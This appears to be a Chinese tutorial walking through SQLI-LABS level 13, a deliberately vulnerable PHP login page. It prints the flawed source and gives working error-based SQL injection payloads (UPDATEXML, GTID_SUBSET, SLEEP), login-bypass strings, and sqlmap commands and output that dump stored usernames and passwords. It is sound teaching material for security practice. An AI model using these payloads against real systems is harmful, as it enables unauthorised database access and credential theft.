目录
一、字符型注入
二、limit函数
三、GET方法与POST方法
四、源码分析
1、代码审计
2、SQL注入安全分析
3、报错型注入与联合注入
五、渗透实战
1、进入靶场
2、注入点分析
(1)SQL语句
(2)admin') #注入探测
(3)admin') or 1=1#注入探测
3、手工注入
(1)获取数据库名
(2)获取表名
(3)获取列名
(4)获取数据
4、sqlmap渗透实战
SQLI-LABS 是一个专门为学习和练习 SQL 注入技术而设计的开源靶场环境,本小节通过手工注入和脚本注入共2种方法对第13关Less 13基于报错型的SQL注入关卡进行渗透实战,相对于前1-10关的最主要区别是报文参数的请求方法由GET变为POST,相对于第12关区别主要是闭合方式由双引号括号变为单引号括号,以及相对于11关和12关区别是登录成功后不再显示文字信息。
一、字符型注入
字符型注入是 SQL 注入的一种类型,攻击者通过在输入字段中插入恶意 SQL 代码来改变原 SQL 语句的逻辑。字符型注入通常发生在SQL 语句使用单引号或者双引号等包裹字符串参数的场景中。攻击者通过闭合单引号或者双引号等符号并注入额外的 SQL 代码,破坏原有语句结构。
二、limit函数
Limit是 SQL 中用于限制查询结果数量的子句,不是真正的函数。Limit通常有两种常见形式,具体如下所示。
-
单参数形式:
LIMIT n-
返回前 n 条记录
-
示例:
LIMIT 5返回前5条结果
-
-
双参数形式:
LIMIT offset, count-
offset:跳过的记录数(从0开始) -
count:要返回的记录数 -
示例:
LIMIT 10, 5跳过前10条,返回接下来的5条
-
举例:SQL语句“SELECT * FROM users WHERE id=('$id') LIMIT 0,1”中的LIMIT 0,1"表示获取第一条匹配的记录",LIMIT0,1的具体含义如下所示,
-
从第0条记录开始(即不跳过任何记录)
-
只返回1条记录
三、GET方法与POST方法
GET 和 POST 是 HTTP 协议中两种常用请求方法,GET 侧重 “获取”,参数可见且有局限性;POST 侧重 “提交”,参数隐蔽且更灵活。两者的详细区别如下表所示。
| 对比项 | GET 方法 | POST 方法 |
|---|---|---|
| 参数位置 | 参数附在 URL 后(如?name=value) | 参数放在 HTTP 请求体中 |
| 可见性 | 参数暴露在 URL 中,不安全 | 参数不可见,相对安全 |
| 编码支持 | 只允许 ASCII 字符 | 支持任何编码类型 |
| 安全性 | 不适合传输敏感数据(如密码) | 更适合传输敏感数据 |
| 应用场景 | 获取数据(如搜索、分页) | 提交数据(如表单、文件上传) |
| 典型注入点 | URL 参数(如id=1' OR 1=1 --) | 表单字段(如 POST 数据中的username) |
四、源码分析
1、代码审计
本关卡Less13是基于字符型的SQL注入关卡,打开对应的源码index.php,如下所示。
Less13关卡的源码功能是登录验证页面,与12关的区别主要是闭合方式由双引号括号变为单引号括号,以及登录成功后不再显示用户名和密码,具体如下所示。
详细注释后的源码如下所示。
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Less-13- Double Injection- String- with twist</title> <!-- 双注入-字符串-带变化 -->
</head><body bgcolor="#000000"> <!-- 黑色背景 -->
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div><!-- 登录表单区域 -->
<div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;"><div style="padding-top:10px; font-size:15px;"><form action="" name="form1" method="post"> <!-- POST方式提交表单 --><div style="margin-top:15px; height:30px;">Username : <input type="text" name="uname" value=""/> <!-- 用户名输入框 --></div> <div> Password : <input type="text" name="passwd" value=""/> <!-- 密码输入框 --></div></br><div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /> <!-- 提交按钮 --></div></form></div>
</div><div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00"><?php
// 包含MySQL连接配置文件
include("../sql-connections/sqli-connect.php");
// 关闭PHP错误报告
error_reporting(0);// 检查是否提交了用户名和密码
if(isset($_POST['uname']) && isset($_POST['passwd']))
{$uname = $_POST['uname']; // 获取用户名$passwd = $_POST['passwd']; // 获取密码// 记录用户输入到日志文件$fp = fopen('result.txt','a');fwrite($fp,'User Name:'.$uname."\n");fwrite($fp,'Password:'.$passwd."\n");fclose($fp);// 构造SQL查询 - 使用括号和单引号@$sql = "SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";$result = mysqli_query($con1, $sql);$row = mysqli_fetch_array($result, MYSQLI_BOTH);if($row) { // 登录成功echo "<br>";echo '<font color= "#FFFF00" font size = 4>';echo '<font size="3" color="#0000ff">'; // 注意:用户名和密码输出被注释掉echo "</font>";echo "<br>";echo "<br>";echo '<img src="../images/flag.jpg" />'; // 成功标志图片 } else { // 登录失败echo '<font color= "#0000ff" font size="3">';print_r(mysqli_error($con1)); // 关键安全风险点:显示数据库错误信息echo "</br>";echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg" />'; // 失败图片echo "</font>"; }
}
?>
</font>
</div>
</body>
</html>这是一个参数为用户名和密码的基于POST请求登录表单的登录验证页面,存在基于错误的SQL注入风险,通过用户名和密码字段的直接拼接构造SQL查询,并显示数据库错误信息,主要功能是:
-
提供用户名和密码的登录表单(POST方法提交)
-
记录所有登录尝试到result.txt日志文件
-
使用括号和单引号构造SQL查询(
WHERE username=('$uname')) -
响应处理:
-
登录成功:仅显示成功图片(不显示具体用户信息,无法使用union法注入)
-
登录失败:显示数据库错误信息和失败图片
-
-
关键风险点:显示详细的MySQL错误信息(有助于报错法注入)
2、SQL注入安全分析
这个代码存在严重的SQL注入安全问题,原因如下:
-
未过滤的用户输入:直接将POST参数包裹双引号括号后拼接到SQL语句中,没有任何过滤或转义处理,如下所示。
$uname = $_POST['uname'];
$passwd = $_POST['passwd'];
@$sql = "SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
-
字符串拼接方式:SQL查询使用单引号括号包裹用户输入,攻击者可以闭合单引号括号注入恶意代码。
-
错误信息显示:当SQL查询出错时,代码会通过print_r(mysqli_error($con1))显示MySQL错误信息,这有助于攻击者进行基于错误的SQL注入。
3、报错型注入与联合注入
报错法和UNION法是SQL注入中两种主要的数据提取技术,具体区别如下所示。
| 对比维度 | 报错法(Error-based) | UNION法(Union-based) |
|---|---|---|
| 基本原理 | 利用数据库错误消息返回敏感信息 | 通过UNION合并查询结果集获取数据 |
| 依赖条件 | 需要显示数据库错误信息 | 需要页面显示查询结果 |
| 查询要求 | 不要求返回数据,只需触发错误 | 要求原查询和UNION查询的列数相同 |
| 技术复杂度 | 中等(需构造特定错误) | 较低(直接拼接查询) |
| 隐蔽性 | 较高(产生错误日志) | 较低(正常查询) |
不过本关卡相对于12关,不回显查询结果(如下图左所示),而12关显示查询结果(如下图右所示),而union联合注入法需要页面显示查询结果才可以渗透成功,故而本关卡无法使用union联合注入法。12关和13关都显示数据库的错误信息,故而这两个关卡都可以用报错法进行注入。
五、渗透实战
1、进入靶场
进入sqli-labs靶场首页,其中包含基础注入关卡、进阶挑战关卡、特殊技术关卡三部分有效关卡,如下所示。
http://127.0.0.1/sqli-labs/
其中第14关在基础注入关卡“SQLi-LABS Page-1(Basic Challenges)”中, 点击进入如下页面。
http://127.0.0.1/sqli-labs/#fm_imagemap
点击上图红框的Less13关卡,进入到靶场的第13关卡字符型POST注入关卡,页面提示登录框,需要输入用户名和密码,具体如下所示。
http://192.168.59.1/sqli-labs/Less-13/
2、注入点分析
(1)SQL语句
根据源码分析可知,本关卡通过 POST 方法接收用户名(username)和密码(passwd),通过括号和单引号包裹用户名和密码字段构造SQL查询。登录成功时只显示成功图片;失败时通过mysqli_error($con1)直接返回数据库错误信息,导致可利用报错注入(如UPDATEXML函数)泄露数据。具体代码如下所示。
$uname = $_POST['uname'];
$passwd = $_POST['passwd'];
@$sql = "SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
页面整体基于错误回显的字符串型注入场景,核心根源在于未对输入做安全处理且暴露数据库错误细节,闭合方式为单引号括号,故而本关卡可以通过POST方法字符型报错注入进行渗透。
(2)admin') #注入探测
bp开启拦截报文,根据上一步我们分析注入点为username和passwd,用户名为admin') #,密码任意,因admin用户存在,故而页面显示登录成功的图标,如下所示。
这个注入执行的SQL语句应为如下内容。
SELECT username, password FROM users WHERE username=('admin')#') and password=('mooyuan') LIMIT 0,1;在navicat中的security数据库中执行如上SQL命令,执行结果如下所示。
(3)admin') or 1=1#注入探测
根据上一步我们分析注入点为username和passwd,尝试万能登录,用户名为admin') or 1=1#,密码任意,如下所示。
点击登录submit,此时页面并没有像上一关卡一样显示“Your Login name:Dumb,Your Password:Dumb;”,只是有个提示登录成功的图片,具体如下所示。
admin') or 1=1#
这个注入执行的SQL语句应为如下内容。
SELECT username, password FROM users WHERE username=('admin') or 1=1#') and password=('mooyuan') LIMIT 0,1;在navicat中的security数据库中执行如上SQL命令,执行结果如下所示。
在burpsuite的历史记录中找到这个报文,抓包效果如下所示。
此时在报文request请求部分右键,选择copy to file并保存为sqli-labs13.txt,如下所示。
3、手工注入
(1)获取数据库名
如下所示,数据库的名称为“security”。
admin') AND UPDATEXML(1,CONCAT(0x7e,(SELECT DATABASE()),0x7e),1)-- 
(2)获取表名
如下所示,数据库security共有4个表格,分别为emails,referers,uagents,users。
admin') AND UPDATEXML(1,CONCAT(0x7e,(SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()),0x7e),1)-- 
(3)获取列名
如下所示,数据库users表的列名分别为id,username,password。
admin') AND UPDATEXML(1,CONCAT(0x7e,(SELECT GROUP_CONCAT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=DATABASE() and TABLE_NAME='users'),0x7e),1)-- 
(4)获取数据
最后通过上一步获取到的列名来提取users表的第一行的username和password内容,如下所示渗透成功。
admin') AND UPDATEXML(1,CONCAT(0x7e,(SELECT CONCAT(username,':',password) FROM users LIMIT 0,1),0x7e),1)-- 
4、sqlmap渗透实战
我们使用sqlmap来进行渗透,参数的含义是获取当前数据库名称(--current-db)并导出所有数据(--dump),全程自动执行无需人工交互(--batch),完整的SQL注入命令如下所示。
sqlmap -r sqli-labs13.txt --current-db --dump --batch其中sqli-labs13.txt中的注入点被修改为如下所示。
POST /sqli-labs/Less-13/ HTTP/1.1
Host: 192.168.59.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.59.1/sqli-labs/Less-13/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 51uname=admin&passwd=&submit=Submitsqlmap渗透成功,可以通过报错法、时间盲注等方法渗透成功,具体信息如下所示。
POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 1101 HTTP(s) requests:
---
Parameter: uname (POST)Type: error-basedTitle: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)Payload: uname=admin') AND GTID_SUBSET(CONCAT(0x71707a6b71,(SELECT (ELT(4858=4858,1))),0x71716a7871),4858)-- vrZv&passwd=&submit=SubmitType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=admin') AND (SELECT 8465 FROM (SELECT(SLEEP(5)))hudZ)-- rODI&passwd=&submit=Submit
---
[23:19:34] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.39, PHP 5.5.9
back-end DBMS: MySQL >= 5.6
[23:19:34] [INFO] fetching current database
[23:19:34] [INFO] retrieved: 'security'
current database: 'security'Table: users
[13 entries]
+----+------------+----------+
| id | password | username |
+----+------------+----------+
| 1 | Dumb | Dumb |
| 2 | I-kill-you | Angelina |
| 3 | p@ssword | Dummy |
| 4 | crappy | secure |
| 5 | stupidity | stupid |
| 6 | genious | superman |
| 7 | mob!le | batman |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dumbo | dhakkan |
| 14 | admin4 | admin4 |
+----+------------+----------+
)
list的使用)
矢量数据)
![[CH582M入门第十步]蓝牙从机](http://pic.xiahunao.cn/[CH582M入门第十步]蓝牙从机)
 ——轮转数组(C语言))
)